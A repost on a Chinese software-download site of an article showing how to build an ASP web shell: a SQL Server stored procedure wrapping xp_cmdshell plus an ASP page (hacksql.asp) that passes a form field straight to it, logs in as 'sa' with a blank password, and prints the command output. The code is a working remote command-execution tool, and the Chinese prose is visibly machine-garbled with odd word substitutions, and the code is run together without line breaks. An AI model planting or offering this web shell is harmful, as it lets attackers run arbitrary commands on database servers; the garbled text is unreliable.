大雀软件园

最新软件 | 热门专题 |
网站导航

软件频道

软件下载 文章资讯 驱动大全

安卓市场

安卓应用 安卓游戏

苹果市场

苹果应用 苹果游戏

游戏下载

电脑游戏 单机游戏 安卓游戏

专题合集

软件专题 苹果专题 安卓专题

快速通道

最新软件 下载排行 下载分类 下载专题
软件
  • 软件
  • 安卓
  • 苹果
  • 专题
搜 索

首页 软件下载 安卓市场 苹果市场 电脑游戏 安卓游戏 文章资讯 驱动下载
技术开发 网页设计 图形图象 数据库 网络媒体 网络安全 站长CLUB 操作系统 媒体动画 安卓相关
当前位置: 首页 -> 技术开发 -> ASP专区 -> 利用sql的存储过程实现dos命令的asp程序(原创^_^)

利用sql的存储过程实现dos命令的asp程序(原创^_^)

时间: 2021-07-31 作者:daque

1、开始在sql内里你不妨考察的数据库内里创造保存进程,比方说:ddy如次:create procedure ddy@cmd varchar(50)asexec master..xp_cmdshell @cmd2、asp步调里如次:(hacksql.asp)<%cmd=trim(request.form("cmd"))if cmd<>"" thenwork()elseshow()end iffunction work()set conn=server.createobject("adodb.connection")set rs=server.createobject("adodb.recordset")conn.open "xx","sa",""sql="exec ddy '"&cmd&"'"rs.open sql,connif not rs.eof thendo while not rs.eof response.write "<pre>"&htmlencode2(trim(rs(0)))&"</pre>"rs.movenextloopelseresponse.write "no"end ifif rs.state=1 then rs.closeset rs=nothingconn.closeset conn=nothingend functionfunction show()%><form action=hacksql.asp method=post>请输出dos吩咐:<input type=text name=cmd><input type=submit value="ok"></form><%end functionfunction htmlencode2(str)'--------变换因变量(为了表露时比拟精巧)dim resultdim lif isnull(str) then htmlencode2="" exit functionend ifl=len(str)result=""dim ifor i = 1 to lselect case mid(str,i,1) case "<"result=result+"<" case ">"result=result+">" case chr(34)result=result+""" case "&"result=result+"&" case chr(13)result=result+"<br>" case chr(9)result=result+"" case "'"result=result+"’" case chr(32) result=result+" "if i+1<=l and i-1>0 then if mid(str,i+1,1)=chr(32) or mid(str,i+1,1)=chr(9) or mid(str,i-1,1)=chr(32) or mid(str,i-1,1)=chr(9)thenresult=result+" " elseresult=result+" " end ifelse result=result+" "end if case elseresult=result+mid(str,i,1) end select next  htmlencode2=result end function%>

相关推荐

推荐下载

热门阅览

最新排行

关于我们| 网站地图| 广告合作| 下载帮助| 下载声明

Copyright © 2019-2021 大雀软件园(www.daque.cn) All Rights Reserved.